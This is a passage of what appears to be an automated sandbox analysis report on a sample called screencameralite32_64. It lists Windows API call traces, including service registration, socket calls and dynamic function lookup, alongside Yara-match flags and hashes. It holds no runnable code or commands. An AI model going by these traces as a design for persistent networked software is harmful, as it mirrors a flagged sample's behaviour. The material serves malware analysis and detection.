                                                              • htonl.WS2_32(00000000), ref: 02C74693
                                                              • htons.WS2_32(00000000), ref: 02C74747
                                                              • _sprintf.LIBCMT ref: 02C7475D
                                                                • Part of subcall function 02C788BF: _memmove.LIBCMT ref: 02C788DF
                                                              • htons.WS2_32(?), ref: 02C746B0
                                                                • Part of subcall function 02C7966A: __EH_prolog.LIBCMT ref: 02C7966F
                                                                • Part of subcall function 02C7966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C796EA
                                                                • Part of subcall function 02C7966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C79708
                                                                • Part of subcall function 02C71BA7: __EH_prolog.LIBCMT ref: 02C71BAC
                                                                • Part of subcall function 02C71BA7: RtlEnterCriticalSection.NTDLL ref: 02C71BBC
                                                                • Part of subcall function 02C71BA7: RtlLeaveCriticalSection.NTDLL ref: 02C71BEA
                                                                • Part of subcall function 02C71BA7: RtlEnterCriticalSection.NTDLL ref: 02C71C13
                                                                • Part of subcall function 02C71BA7: RtlLeaveCriticalSection.NTDLL ref: 02C71C56
                                                                • Part of subcall function 02C7DE26: __EH_prolog.LIBCMT ref: 02C7DE2B
                                                              • htonl.WS2_32(?), ref: 02C7497C
                                                              • htonl.WS2_32(00000000), ref: 02C74983
                                                              • htonl.WS2_32(00000000), ref: 02C749C8
                                                              • htonl.WS2_32(00000000), ref: 02C749CF
                                                              • htons.WS2_32(?), ref: 02C749EF
                                                              • htons.WS2_32(?), ref: 02C749F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                              • String ID:
                                                              • API String ID: 1645262487-0
                                                              • Opcode ID: afc64bb53eae122f99f2810eeb95b36d862568d266856dbd71e7962c0b871e48
                                                              • Instruction ID: 4aed59f1483200434cfd3c71034bcb11af3cbfedc34cf5306f72e1c66801b624
                                                              • Opcode Fuzzy Hash: afc64bb53eae122f99f2810eeb95b36d862568d266856dbd71e7962c0b871e48
                                                              • Instruction Fuzzy Hash: 6F024671D11259EFEF25DBA4C848BEEBBB9BF08304F10419AE505B7280DB745A48DFA1
                                                              APIs
                                                              • RegisterServiceCtrlHandlerA.ADVAPI32(Escape Division LIB 10.6.45,0040235E), ref: 004023C1
                                                              • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                              • GetLastError.KERNEL32 ref: 00402422
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                              • GetLastError.KERNEL32 ref: 00402450
                                                              • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                              • CloseHandle.KERNEL32 ref: 004024A1
                                                              • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                              Strings
                                                              • Escape Division LIB 10.6.45, xrefs: 004023BC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                              • String ID: Escape Division LIB 10.6.45
                                                              • API String ID: 3346042915-2105205552
                                                              • Opcode ID: 4a6d7b4b3a38e5675ed61966f5baffed97c723ce678f584e4e9b89083ef9a130
                                                              • Instruction ID: e6adc4c3184f3a6cfae72656e119ad5bee77799747d824a3adffb05c067b79ab
                                                              • Opcode Fuzzy Hash: 4a6d7b4b3a38e5675ed61966f5baffed97c723ce678f584e4e9b89083ef9a130
                                                              • Instruction Fuzzy Hash: 3521E870441214EBC2105F16EFE99267FACFBD5794711823EE544B22B2C7B9054ACF6D
                                                              APIs
                                                              • RtlDecodePointer.NTDLL(?), ref: 02C8827A
                                                              • _free.LIBCMT ref: 02C88293
                                                                • Part of subcall function 02C82EB4: HeapFree.KERNEL32(00000000,00000000,?,02C85C12,00000000,00000104,74DF0A60), ref: 02C82EC8
                                                                • Part of subcall function 02C82EB4: GetLastError.KERNEL32(00000000,?,02C85C12,00000000,00000104,74DF0A60), ref: 02C82EDA
                                                              • _free.LIBCMT ref: 02C882A6
                                                              • _free.LIBCMT ref: 02C882C4
                                                              • _free.LIBCMT ref: 02C882D6
                                                              • _free.LIBCMT ref: 02C882E7
                                                              • _free.LIBCMT ref: 02C882F2
                                                              • _free.LIBCMT ref: 02C88316
                                                              • RtlEncodePointer.NTDLL(00B7E908), ref: 02C8831D
                                                              • _free.LIBCMT ref: 02C88332
                                                              • _free.LIBCMT ref: 02C88348
                                                              • _free.LIBCMT ref: 02C88370
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 3064303923-0
                                                              • Opcode ID: 596503a164a4263c8b788968e56d00919b0dab308a43c63e8ae0d190059df9f3
                                                              • Instruction ID: 310412eb74749386939d74a642d3babc15b677f3311cc803792ebd5c8f94c040
                                                              • Opcode Fuzzy Hash: 596503a164a4263c8b788968e56d00919b0dab308a43c63e8ae0d190059df9f3
                                                              • Instruction Fuzzy Hash: F421F332C81294EFCF257F14F8547067769AB4076D32D8B2AEC08A7680C7349DA0CF9A
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BBD
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BD1
                                                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BFD
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C35
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C57
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C70
                                                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403C83
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403CC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                              • String ID: 4/@
                                                              • API String ID: 1823725401-3101945251
                                                              • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                              • Instruction ID: a2970ceca2a6c3f976dc545d3d2173026391ae6ff2d108e1c7f08cdddd2a955e
                                                              • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                              • Instruction Fuzzy Hash: AD31F27350C1245EE7202F785DC883B7E9CEA4534A711093FF942F3380EA798E81466D
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C73428
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C7346B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C73472
                                                              • GetLastError.KERNEL32 ref: 02C73486
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C734D7
                                                              • RtlEnterCriticalSection.NTDLL(00000018), ref: 02C734ED
                                                              • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C73518
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                              • String ID: CancelIoEx$KERNEL32
                                                              • API String ID: 2902213904-434325024
                                                              • Opcode ID: 3d1b88abe40637e0067ac03c25a1088c78dfb76646847513f6ccc1f85dbe0707
                                                              • Instruction ID: 346bee22539d70a88f6c5bc4da9f4549ff9bdb2f712b70bccc7e53d88d185728
                                                              • Opcode Fuzzy Hash: 3d1b88abe40637e0067ac03c25a1088c78dfb76646847513f6ccc1f85dbe0707
                                                              • Instruction Fuzzy Hash: E931A2B1900245DFDB11EFA4C888BAABBF9FF89311F0085A9E8159B340D770D915DFA1
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404381,?,Microsoft Visual C++ Runtime Library,00012010,?,0040858C,?,004085DC,?,?,?,Runtime Error!Program: ), ref: 0040658A
                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004065A2
                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004065B3
                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004065C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                              • API String ID: 2238633743-4044615076
                                                              • Opcode ID: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                              • Instruction ID: 34c45dea863b0ad37b671b2ee6745cf1fa65c172ae9c71c573f5c1b511995102
                                                              • Opcode Fuzzy Hash: 987b992b6f5bbeab899bec9017d6b859524fa9c80776c30a59c8d29f16b735e1
                                                              • Instruction Fuzzy Hash: FA017571A40201FFCB209FB5BFC492B3AE99B58690306193FB541F2291DE79C815DB68
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,00000100,00408658,00000001,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406899
                                                              • LCMapStringA.KERNEL32(00000000,00000100,00408654,00000001,00000000,00000000,?,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004068B5
                                                              • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00406317,?,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 004068FE
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00406317,00200020,00000000,?,00000000,00000000), ref: 00406936
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 0040698E
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406317,00200020,00000000,?,00000000), ref: 004069A4
                                                              • LCMapStringW.KERNEL32(00000000,?,00406317,00000000,00406317,?,?,00406317,00200020,00000000,?,00000000), ref: 004069D7
                                                              • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406317,00200020,00000000,?,00000000), ref: 00406A3F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: String$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 352835431-0
                                                              • Opcode ID: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                              • Instruction ID: 8dbeb6cb8c932cbdef2775d2a29e2de0fc7c35b208bd80b0a47b5516e3ba15ce
                                                              • Opcode Fuzzy Hash: e9f64dd7570e4df949ea1626fd4153753d4334a99172a5ae067b945d03b43c58
                                                              • Instruction Fuzzy Hash: 3E518A71500209EBCF219F94CD45AAF7BB5FB49714F12413AF912B12A0C73A8C21DB69
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 004042CA
                                                              • GetStdHandle.KERNEL32(000000F4,0040858C,00000000,?,00000000,00000000), ref: 004043A0
                                                              • WriteFile.KERNEL32(00000000), ref: 004043A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: File$HandleModuleNameWrite
                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                              • API String ID: 3784150691-4022980321
                                                              • Opcode ID: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                              • Instruction ID: ad501088bf1d437e3d5a217a77e101a13ac7783d72fc0021c8d9dd27a33d1b06
                                                              • Opcode Fuzzy Hash: 4bb15c7821e3b7df3b39c29bb8507035fb8a1658cdd6742b24a8a426161d7798
                                                              • Instruction Fuzzy Hash: 52318772600218AFDF2096608E45FDA736DAF85304F1004BFF944B61D1EA789D458A5D
                                                              APIs
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,AB81015D), ref: 02C815F0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C81605
                                                              • ResetEvent.KERNEL32(00000000,AB81015D), ref: 02C8160F
                                                              • CloseHandle.KERNEL32(00000000,AB81015D), ref: 02C81644
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AB81015D), ref: 02C816BA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C816CF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEventHandle$CreateOpenReset
                                                              • String ID:
                                                              • API String ID: 1285874450-0
                                                              • Opcode ID: 264a4f64e6e7fb35840d17a8ef87172f5cfaadf10a5c9b17803ce20c724fad36
                                                              • Instruction ID: 8acd9e0c9c752cab53efb381b9ab3852cdeabec4b991e323c3d01cb5019ac16f
                                                              • Opcode Fuzzy Hash: 264a4f64e6e7fb35840d17a8ef87172f5cfaadf10a5c9b17803ce20c724fad36
                                                              • Instruction Fuzzy Hash: 92414370D05358AFDF10DFA5C848BADBBF8EF45728F188219E459EB280D7719A06CB90
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C720AC
                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C720CD
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C720D8
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C7213E
                                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C7217A
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C72187
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C721A6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                              • String ID:
                                                              • API String ID: 1171374749-0
                                                              • Opcode ID: fcd7c8bc5e2d12cbcc374db1f1da592be056f7db3be1e0506b83e0297125489c
                                                              • Instruction ID: 776ae8cf39f85e3520d168781bd3baf09760d9aa149f299b6bdc5a8892bcb299
                                                              • Opcode Fuzzy Hash: fcd7c8bc5e2d12cbcc374db1f1da592be056f7db3be1e0506b83e0297125489c
                                                              • Instruction Fuzzy Hash: 544129B15047059FC311DF25D889A6BBBF9FFC8654F044A1EF89A82650D730E909DFA2
                                                              APIs
                                                                • Part of subcall function 02C81E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C8166E,?,?), ref: 02C81E3F
                                                                • Part of subcall function 02C81E10: CloseHandle.KERNEL32(00000000,?,?,02C8166E,?,?), ref: 02C81E54
                                                                • Part of subcall function 02C81E10: SetEvent.KERNEL32(00000000,02C8166E,?,?), ref: 02C81E67
                                                              • OpenEventA.KERNEL32(00100002,00000000,00000000,AB81015D), ref: 02C815F0
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C81605
                                                              • ResetEvent.KERNEL32(00000000,AB81015D), ref: 02C8160F
                                                              • CloseHandle.KERNEL32(00000000,AB81015D), ref: 02C81644
                                                              • __CxxThrowException@8.LIBCMT ref: 02C81675
                                                                • Part of subcall function 02C8449A: RaiseException.KERNEL32(?,?,02C7FA92,?,?,?,?,?,?,?,02C7FA92,?,02CA0F78,?), ref: 02C844EF
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AB81015D), ref: 02C816BA
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C816CF
                                                                • Part of subcall function 02C81B50: GetCurrentProcessId.KERNEL32(?), ref: 02C81BA9
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,AB81015D), ref: 02C816DF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                              • String ID:
                                                              • API String ID: 2227236058-0
                                                              • Opcode ID: d26387e70c63910ed995114ef71e920937f4a9c249bd011692738be05f69a5aa
                                                              • Instruction ID: 4de3a89c08ee41b9ff5fcb102c779381327f353171e788ab8f0f7fa8f40c24f6
                                                              • Opcode Fuzzy Hash: d26387e70c63910ed995114ef71e920937f4a9c249bd011692738be05f69a5aa
                                                              • Instruction Fuzzy Hash: C6317F71D003089BDF20EBA4DC44BADB7F9EF45329F188219E85DEB280D7B09A068B50
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 02C85CD4
                                                                • Part of subcall function 02C88442: RtlEncodePointer.NTDLL(00000000), ref: 02C88445
                                                                • Part of subcall function 02C88442: __initp_misc_winsig.LIBCMT ref: 02C88460
                                                                • Part of subcall function 02C88442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02CA1578,00000008,00000003,02CA0F5C,?,00000001), ref: 02C891C1
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C891D5
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C891E8
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C891FB
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C8920E
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C89221
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C89234
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C89247
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C8925A
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C8926D
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C89280
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C89293
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C892A6
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C892B9
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C892CC
                                                                • Part of subcall function 02C88442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C892DF
                                                              • __mtinitlocks.LIBCMT ref: 02C85CD9
                                                              • __mtterm.LIBCMT ref: 02C85CE2
                                                                • Part of subcall function 02C85D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C88878
                                                                • Part of subcall function 02C85D4A: _free.LIBCMT ref: 02C8887F
                                                                • Part of subcall function 02C85D4A: RtlDeleteCriticalSection.NTDLL(02CA3978), ref: 02C888A1
                                                              • __calloc_crt.LIBCMT ref: 02C85D07
                                                              • __initptd.LIBCMT ref: 02C85D29
                                                              • GetCurrentThreadId.KERNEL32 ref: 02C85D30
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 9f4efc37a980f295f5bff97be891094998b06e28333a2c9c61c1e6f91dc2e0b9
                                                              • Instruction ID: 53501121727a12a456363938f0a0650943ac77bb8f22dd34711b6131cca2ea7e
                                                              • Opcode Fuzzy Hash: 9f4efc37a980f295f5bff97be891094998b06e28333a2c9c61c1e6f91dc2e0b9
                                                              • Instruction Fuzzy Hash: 42F024325597111EE62476B87D0A35B2786EF417BCBA2CB2EE850CA0C0FFA188006D55
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C833B6,00000000), ref: 02C8341E
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C83425
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C83431
                                                              • RtlDecodePointer.NTDLL(00000001), ref: 02C8344E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 3489934621-340411864
                                                              • Opcode ID: fd125261bdb759fc45d4c366aca95c9c1389e61e9bece1f5131e4519f2594d59
                                                              • Instruction ID: dc0bde9ceb05b3011cf8199536040cb56399459fc5ab42c4a3f5575341a5d519
                                                              • Opcode Fuzzy Hash: fd125261bdb759fc45d4c366aca95c9c1389e61e9bece1f5131e4519f2594d59
                                                              • Instruction Fuzzy Hash: A6E012B0DE1340EBEF105F70DC8EB063A69A741B4BF509B60B00AD7184C7B541A89F54
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C833F3), ref: 02C834F3
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C834FA
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02C83505
                                                              • RtlDecodePointer.NTDLL(02C833F3), ref: 02C83520
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 013a49bd2ca3c90867ce834be87931b9820700f8d02e0cf19708c2dfe93501eb
                                                              • Instruction ID: e07efec8e145815d77a10e900eb8e9e39446f97faa708ecacfea292c630f5696
                                                              • Opcode Fuzzy Hash: 013a49bd2ca3c90867ce834be87931b9820700f8d02e0cf19708c2dfe93501eb
                                                              • Instruction Fuzzy Hash: 6CE0BFB0DE1300EBEF305F70EC0EB0576A9B74570AF245A64F106E3184C77852688E58
                                                              APIs
                                                              • TlsGetValue.KERNEL32(0000002A,AB81015D,?,?,?,?,00000000,02C969F8,000000FF,02C8210A), ref: 02C81EAA
                                                              • TlsSetValue.KERNEL32(0000002A,02C8210A,?,?,00000000), ref: 02C81F17
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81F41
                                                              • HeapFree.KERNEL32(00000000), ref: 02C81F44
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HeapValue$FreeProcess
                                                              • String ID:
                                                              • API String ID: 1812714009-0
                                                              • Opcode ID: 997a5d8e8e177c76d14c7fa24b6eab7096ca46b51d3c535ad91c5fe8ed37c6e3
                                                              • Instruction ID: 45cce7892ddd239002ffb01111c938aca854a89325525dd03bd38c0aeb29b341
                                                              • Opcode Fuzzy Hash: 997a5d8e8e177c76d14c7fa24b6eab7096ca46b51d3c535ad91c5fe8ed37c6e3
                                                              • Instruction Fuzzy Hash: 2B51BE71A043449FDB20EF29C848B16BBE4FF85668F09C658F85D97280D7B1ED11CB91
                                                              APIs
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 02C956D0
                                                              • __FindPESection.LIBCMT ref: 02C956EA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                              • String ID:
                                                              • API String ID: 876702719-0
                                                              • Opcode ID: ae692c3de1bcba09b77017e58741c2ed91b19c0c17b468517fc2a663db1e4691
                                                              • Instruction ID: 6b7a4b9d5eaadaf4a3db15585a3ccaae59274dc60d15947a9076e136aca28fa3
                                                              • Opcode Fuzzy Hash: ae692c3de1bcba09b77017e58741c2ed91b19c0c17b468517fc2a663db1e4691
                                                              • Instruction Fuzzy Hash: 30A1C171A41215CFDF26CF69C8887ADB7A5FB843A8F954669DC05D7340E731EA01CB90
                                                              APIs
                                                              • GetStringTypeW.KERNEL32(00000001,00408658,00000001,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040674D
                                                              • GetStringTypeA.KERNEL32(00000000,00000001,00408654,00000001,?,?,00000000,00000000,00000001), ref: 00406767
                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 0040679B
                                                              • MultiByteToWideChar.KERNEL32(00406317,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00406317,00200020,00000000,?,00000000,00000000,00000001), ref: 004067D3
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406829
                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040683B
                                                              Memory Dump Source
